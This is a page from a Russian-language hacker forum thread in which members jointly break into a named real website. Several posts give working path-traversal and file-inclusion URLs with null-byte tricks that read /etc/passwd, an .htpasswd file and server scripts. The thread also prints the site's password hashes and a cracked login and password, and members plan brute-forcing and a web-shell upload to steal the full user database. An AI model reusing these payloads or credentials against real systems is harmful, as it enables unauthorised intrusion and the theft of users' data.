sql inj

Discussion in 'PHP' started by satana8920, 25 Dec 2006.

Page 2 of 3
  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Тебе подсказали.
    Читай доки и разбирайся сам за тебя не кто делать нечего не будет.
     
    #21 guest3297, 25 Dec 2006
  2. Arin

    Arin Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    67
    Likes Received:
    29
    Reputations:
    6
    Незнаю, но это кажеться поинтереснее
    _http://gibbon.kinnet.ru/gallerys/gallery.php?dir=
     
    #22 Arin, 25 Dec 2006
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    _http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../../../../../../../etc/passwd%00
     
    #23 guest3297, 25 Dec 2006
  4. Arin

    Arin Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    67
    Likes Received:
    29
    Reputations:
    6
    Вот вот =)
    Ну и если уж идти до конца
    _http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../admin/.htpasswd%00

    содержит
    Code:
    gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
     
    #24 Arin, 25 Dec 2006
    Last edited: 26 Dec 2006
    3 people like this.
  5. gadjet

    gadjet Elder - Старейшина

    Joined:
    17 Dec 2005
    Messages:
    58
    Likes Received:
    18
    Reputations:
    2
    Ну и если уж идти до конца, то кто-то должен брутить пароли.
     
    #25 gadjet, 26 Dec 2006
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    [/quote]Ну и если уж идти до конца, то кто-то должен брутить пароли.
     
    #26 guest3297, 26 Dec 2006
    1 person likes this.
  7. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    патци это как я понимаю пасы gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
    всем по +1
     
    #27 satana8920, 26 Dec 2006
    Last edited: 26 Dec 2006
  8. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    login:locky
    pass: underwat
     
    #28 limpompo, 26 Dec 2006
    Last edited: 26 Dec 2006
    1 person likes this.
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2satana8920
    это хеши в DES
     
    #29 guest3297, 26 Dec 2006
  10. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    да я уже понял что это хеши ща как нить расщифруем тока не знаю где джона взять под вынь
     
    #30 satana8920, 26 Dec 2006
  11. aivus

    aivus New Member

    Joined:
    25 Dec 2006
    Messages:
    17
    Likes Received:
    4
    Reputations:
    0
    satana8920
    limpompo за тебя уже все сделал.

    login:locky
    pass: underwat

    Тебе одного не хватит?
     
    #31 aivus, 26 Dec 2006
  12. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../index.php%00

    хы )
    http://webcam.kinnet.ru/
     
    #32 Talisman, 27 Dec 2006
  13. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    понимаешь в чем дело друг мой мне нужна ВСЯ бд юзарей на этом сервере вот я че и парюсь
     
    #33 satana8920, 27 Dec 2006
  14. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    Warning: pg_exec() query failed: ERROR: Unterminated quoted string in /home/httpd/html/forum/forum.php3 on line 488

    Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /home/httpd/html/forum/forum.php3 on line

    из-за бажного поиска форума - абсолютный путь его.... инклудимс )
    http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00
     
    #34 Talisman, 27 Dec 2006
  15. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    так мне БД нужна куда мне админки
     
    #35 satana8920, 27 Dec 2006
  16. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    ну мона впринципе на сервак че нить залить ибудет мне доступ ко всему через какой нить скрипт баговы
    мона веть так чделать?
     
    #36 satana8920, 27 Dec 2006
  17. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    обижаешь! подумай хорошенько - чем больше зацепок, тем больше шанс.
    и если ты знаеш, что тебе нужно и указываешь другим, что им не нужно делать, так может быть сам сделаешь?
     
    #37 Talisman, 27 Dec 2006
  18. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    да ладно я молчу :Х
     
    #38 satana8920, 27 Dec 2006
  19. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    а смысл вот этого инклуда чего он нам дает то ??
     
    #39 satana8920, 27 Dec 2006
  20. Arin

    Arin Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    67
    Likes Received:
    29
    Reputations:
    6
    Наверное фсетаки офтоп, но судя по новостям на _http://gibbon.kinnet.ru, уже даже найденные дырочки вскоре прикроют. Зря наверно подобранные пароли выложили..
    Хотя конечно как показывает практика, (_4919.fatal.ru) админ может на сайт не заглядывать месяцами.
     
    #40 Arin, 27 Dec 2006
(You must log in or sign up to post here.)
Page 2 of 3